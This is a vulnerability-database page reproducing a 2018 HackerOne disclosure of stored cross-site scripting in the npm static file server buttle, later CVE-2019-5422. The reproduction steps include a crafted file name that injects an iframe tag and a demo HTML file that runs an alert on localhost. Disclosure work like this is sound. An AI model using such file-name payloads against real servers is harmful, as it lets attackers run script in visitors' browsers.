Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneBl4deH1:331110
HistoryMar 29, 2018 - 2:49 p.m.

Node.js third-party modules: [buttle] HTML Injection in filename leads to XSS when directory listing is displayed in the browser

2018-03-2914:49:58
bl4de
hackerone.com
16

0.001 Low

EPSS

Percentile

38.3%

JSON

I would like to report HTML Injection in buttle module.

Due to lack of filenames sanitization, it is possible to inject malicious iframe tag via filename and execute arbitray JavaScript code.

Module

module name: buttleversion:0.2.0npm page: https://www.npmjs.com/package/buttle

Module Description

Simple static file (+ markdown) server.

Module Stats

Stats:

N/A, estimated ~20-40 downloads/week

Vulnerability

Vulnerability Description

When buttle displays directory index in the browser, it uses directory.js middleware from connect module to create an output with HTML. Because methods to escape user output used in this middleware are not sufficient enough (it’s actually quite outdated version of connect), it is possible to inject iframe tag with src attribute set to arbitrary HTML file, which can contain any executable JavaScript code.

Steps To Reproduce:

  • install buttle:
$ npm i buttle

  • create file with the following name: "><iframe src="malware_frame.html">

  • create malwrae_frame.html file with following content:

<html>

<head>
    <meta charset="utf8" />
    <title>Frame embeded with malware :P</title>
</head>

<body>
    <p>iframe element with malicious code</p>
    
    &lt;script&gt;
        alert('Uh oh, I am bad, bad malware!!!')
    &lt;/script&gt;
&lt;/body&gt;

&lt;/html&gt;
  • run buttle:
$ ./node_modules/buttle/bin/buttle -p 8080
Listening on port 8080
  • in browser, open the following url:
http://localhost:8080

You see JavaScript from malware_frame.html executed immediately:

{F279830}

Patch

Probably updating all dependiences is a good solution.

Supporting Material/References:

  • Operating system: Ubuntu 16.04
  • Node.js 8.9.4
  • npm v. 5.6.0
  • Chromium Version 67.0.3367.0 (Developer Build) (64-bit)

Wrap up

  • I contacted the maintainer to let them know: [N]
  • I opened an issue in the related repository: [N]

I hope my report will help to keep Node.js ecosystem and its users safe :)

Regards,

Rafal ‘bl4de’ Janicki

Impact

An attacker is able to execute arbitrary JavaScript code in user’s browser

The hacker selected the Cross-site Scripting (XSS) - Stored weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:

URL
http://localhost:8080

Verified
Yes

Related

osv 1
veracode 1
prion 1
cve 1
github 1
nodejs 2
nvd 1
cvelist 1
osv
osv
Cross-Site Scripting in buttle
2019-04-08 15:18:38
veracode
veracode
Cross-site Scripting (XSS)
2018-07-05 05:21:19
prion
prion
Cross site scripting
2019-04-03 15:29:00
cve
cve
CVE-2019-5422
2019-04-03 15:29:01
github
github
Cross-Site Scripting in buttle
2019-04-08 15:18:38
nodejs
nodejs
Command Injection
2018-05-16 20:00:30
Cross-Site Scripting
2019-06-19 20:03:20
nvd
nvd
CVE-2019-5422
2019-04-03 15:29:01
cvelist
cvelist
CVE-2019-5422
2019-04-03 14:21:40

0.001 Low

EPSS

Percentile

38.3%

JSON
Related for H1:331110
osv1veracode1prion1cve1github1nodejs2nvd1cvelist1